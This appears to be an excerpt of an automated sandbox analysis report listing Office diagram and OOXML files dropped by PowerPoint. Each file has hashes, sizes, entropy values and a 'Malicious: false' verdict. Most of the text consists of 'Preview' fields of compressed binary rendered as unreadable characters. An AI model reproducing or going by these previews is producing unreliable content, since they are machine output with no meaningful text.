                                                                                                                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4243
                                                                                                                              Entropy (8bit):7.824383764848892
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16806
                                                                                                                              Entropy (8bit):7.9519793977093505
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                              MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11380
                                                                                                                              Entropy (8bit):7.891971054886943
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6024
                                                                                                                              Entropy (8bit):7.886254023824049
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):9191
                                                                                                                              Entropy (8bit):7.93263830735235
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4326
                                                                                                                              Entropy (8bit):7.821066198539098
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                              MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7370
                                                                                                                              Entropy (8bit):7.9204386289679745
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5596
                                                                                                                              Entropy (8bit):7.875182123405584
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                              MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3683
                                                                                                                              Entropy (8bit):7.772039166640107
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4888
                                                                                                                              Entropy (8bit):7.8636569313247335
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6448
                                                                                                                              Entropy (8bit):7.897260397307811
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                              MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5630
                                                                                                                              Entropy (8bit):7.87271654296772
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6193
                                                                                                                              Entropy (8bit):7.855499268199703
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                              Malicious:false
